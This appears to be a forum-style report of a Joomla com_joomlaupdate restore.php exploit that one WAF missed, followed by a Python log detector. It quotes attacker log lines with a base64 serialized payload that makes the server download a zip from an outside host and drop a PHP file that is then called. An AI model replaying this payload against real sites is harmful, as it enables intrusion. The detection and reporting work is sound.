Joomla Exploit not detected

Tonight a client was attacked with a Joomla exploit that the server with the Comodo WAF didn’t stop, but the server with OWASP stopped.

Pages about this exploit:

String used by the attacker to use the exploit:

81.163.131.58 - - [14/Apr/2015:21:03:03 +0100] "GET /sindite/administrator/components/com_joomlaupdate/restore.php?task=stepRestore&factory=Tzo5OiJBS0ZhY3RvcnkiOjE6e3M6MTg6IgBBS0ZhY3RvcnkAdmFybGlzdCI7YToyOntzOjI3OiJraWNrc3RhcnQuc2VjdXJpdHkucGFzc3dvcmQiO3M6MDoiIjtzOjI2OiJraWNrc3RhcnQuc2V0dXAuc291cmNlZmlsZSI7czozODoiaHR0cDovL29yZW5yc3V0ZS5ydS9pbWFnZXMvd3Q1MTI0bi56aXAiO319 HTTP/1.1" 200 3841 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"
81.163.131.58 - - [14/Apr/2015:21:03:05 +0100] "POST /sindite/administrator/components/com_joomlaupdate/wt5124n.php HTTP/1.1" 200 9 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"

Solution for now: remove restore.php from com_joomlaupdate (by Akeeba).

Thank you for your report. Will be fixed.
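A log-side check for the request pattern reported above, as an added example that is not part of the original thread or of either WAF rule set: the `factory` values in the reported requests start with `Tzo`, which is base64 for `O:`, the header of a PHP serialized object, so the detector decodes the parameter and looks for that header. The sample log lines, the client address and the class name `ExampleClass` are constructed for illustration.

```python
import base64
import re
from urllib.parse import urlsplit, parse_qs

# Combined Log Format: client IP, method, request target, status.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
                    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')
# PHP serialized object header, top-level or nested: O:<len>:"<Class>":
PHP_OBJECT_RE = re.compile(rb'(?:^|[;{])[OC]:\d+:"([A-Za-z_\\][A-Za-z0-9_\\]*)":')

def decode_factory(value):
    """Base64-decode the parameter; return b'' when it is not valid base64."""
    value = value.replace(" ", "+")      # parse_qs turns '+' into a space
    value += "=" * (-len(value) % 4)     # tolerate stripped padding
    try:
        return base64.b64decode(value, validate=True)
    except ValueError:
        return b""

def inspect_line(line):
    """Return a finding if a restore.php request carries a serialized PHP
    object in its 'factory' parameter, otherwise None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    url = urlsplit(m["target"])
    if not url.path.endswith("/restore.php"):
        return None
    for value in parse_qs(url.query).get("factory", []):
        classes = PHP_OBJECT_RE.findall(decode_factory(value))
        if classes:
            return {"ip": m["ip"], "path": url.path, "status": int(m["status"]),
                    "classes": sorted({c.decode() for c in classes})}
    return None

def scan(lines):
    return [finding for finding in map(inspect_line, lines) if finding]

RESTORE = "/administrator/components/com_joomlaupdate/restore.php"

def _sample(payload, path=RESTORE):
    """Build a constructed access-log line whose factory= value is base64(payload)."""
    b64 = base64.b64encode(payload).decode()
    return (f'192.0.2.10 - - [01/Jan/2020:00:00:00 +0000] "GET {path}'
            f'?task=stepRestore&factory={b64} HTTP/1.1" 200 114 "-" "constructed-agent"')

SAMPLE_LOG = [  # constructed input, not taken from the report
    _sample(b'O:12:"ExampleClass":1:{s:1:"a";O:8:"stdClass":0:{}}'),  # flagged
    _sample(b'{"task":"ping"}'),                                       # no object
    _sample(b'O:12:"ExampleClass":0:{}', path="/index.php"),           # other path
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

A 200 status on a flagged line, as in the reported requests, means the request reached restore.php, so the component directory is worth checking for files that were not there before.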